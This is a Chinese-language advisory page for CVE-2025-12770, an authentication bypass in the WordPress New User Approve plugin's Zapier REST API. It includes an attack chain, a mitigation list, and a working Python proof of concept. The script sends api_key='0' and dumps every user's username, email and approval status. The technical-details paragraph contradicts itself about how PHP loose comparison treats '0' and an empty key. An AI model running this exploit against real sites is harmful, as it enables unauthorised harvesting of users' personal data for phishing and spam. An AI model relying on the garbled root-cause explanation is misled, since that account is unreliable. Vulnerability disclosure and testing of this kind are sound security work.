CVE-2025-12770 WordPress New User Approve插件API密钥验证绕过导致敏感信息泄露

漏洞信息

漏洞编号

CVE-2025-12770

漏洞类型

身份验证绕过/敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

New User Approve WordPress插件

漏洞概述

CVE-2025-12770是WordPress New User Approve插件中的一个严重安全漏洞，存在于所有版本直至3.0.9。该漏洞由于Zapier REST API端点的API密钥验证机制存在缺陷，攻击者可以利用PHP类型混淆（type juggling）特性，通过发送api_key参数为"0"的请求来绕过身份验证。在目标站点未配置Zapier API密钥的情况下，未经身份认证的攻击者可以访问Zapier REST API端点，非法获取用户的个人身份信息（PII），包括用户名和电子邮件地址等敏感数据。此漏洞无需任何权限或用户交互即可被利用，CVSS评分为5.3，属于中等严重级别。攻击者可以利用泄露的用户信息进行进一步的社会工程攻击、垃圾邮件发送或其他恶意活动。

技术细节

该漏洞的根本原因在于New User Approve插件的Zapier REST API实现中使用了PHP的松散比较（loose comparison）来验证API密钥。在rest-api.php文件的第40行和第104行附近，代码使用==而非===进行密钥比较。当攻击者发送api_key参数值为"0"的请求时，PHP会将"0"与未设置的API密钥（空字符串""）进行松散比较，由于PHP的类型转换规则，空字符串和"0"在松散比较中被视为相等（"0" == ""返回false，但逻辑是"0" == $stored_key，其中$stored_key为空时可能触发其他逻辑）。实际上，攻击者利用的是当Zapier API密钥未配置时，插件未能正确拒绝请求。攻击者只需构造一个简单的HTTP请求，将api_key参数设置为"0"，即可通过验证并访问所有用户的PII数据。该漏洞影响所有使用New User Approve插件且启用了Zapier集成但未配置API密钥的WordPress站点。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标WordPress站点，识别是否安装New User Approve插件并确定版本号（<=3.0.9）

STEP 2

步骤2

确认漏洞存在：攻击者检查站点是否启用了Zapier REST API端点（/wp-json/new-user-approve/v1/）且未配置API密钥

STEP 3

步骤3

构造恶意请求：攻击者构造HTTP GET请求，将api_key参数设置为"0"，利用PHP松散比较的类型混淆特性绕过身份验证

STEP 4

步骤4

数据窃取：发送构造的请求到Zapier REST API端点，成功通过验证后接收包含所有用户PII的响应数据

STEP 5

步骤5

信息利用：攻击者提取用户名、邮箱地址和用户审批状态等信息，用于后续攻击如社会工程、钓鱼攻击或垃圾邮件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-12770 PoC
# New User Approve Plugin - API Key Validation Bypass
# Affects: New User Approve <= 3.0.9

target_url = "http://target-wordpress-site.com"

# Step 1: Identify Zapier REST API endpoint
api_endpoint = f"{target_url}/wp-json/new-user-approve/v1/users"

# Step 2: Exploit the type juggling vulnerability
# Send api_key="0" to bypass authentication
payload = {
    "api_key": "0"
}

print("[*] Attempting to exploit CVE-2025-12770...")
print(f"[*] Target: {api_endpoint}")

try:
    # Make request with api_key="0"
    response = requests.get(api_endpoint, params=payload, timeout=10)
    
    print(f"[*] Status Code: {response.status_code}")
    
    if response.status_code == 200:
        data = response.json()
        print("[+] SUCCESS! Authentication bypassed!")
        print("[+] Retrieved user data:")
        print(json.dumps(data, indent=2))
        
        # Extract PII information
        if isinstance(data, list):
            for user in data:
                if isinstance(user, dict):
                    username = user.get('user_login', user.get('username', 'N/A'))
                    email = user.get('user_email', user.get('email', 'N/A'))
                    status = user.get('status', 'N/A')
                    print(f"  - Username: {username}, Email: {email}, Status: {status}")
    else:
        print(f"[-] Failed. Status: {response.status_code}")
        print(f"[-] Response: {response.text[:200]}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

print("\n[*] Note: This PoC only works on sites where Zapier API key is not configured.")

影响范围

New User Approve WordPress插件所有版本 <= 3.0.9

防御指南

临时缓解措施

在等待官方修复期间，可以采取以下临时缓解措施：1）立即升级New User Approve插件到最新版本；2）如果无法升级，可以通过.htaccess或nginx配置阻止对/wp-json/new-user-approve/路径的未授权访问；3）确保Zapier API密钥已配置且强度足够；4）考虑暂时禁用Zapier集成功能；5）监控日志中的异常API访问请求；6）实施IP白名单限制对REST API端点的访问。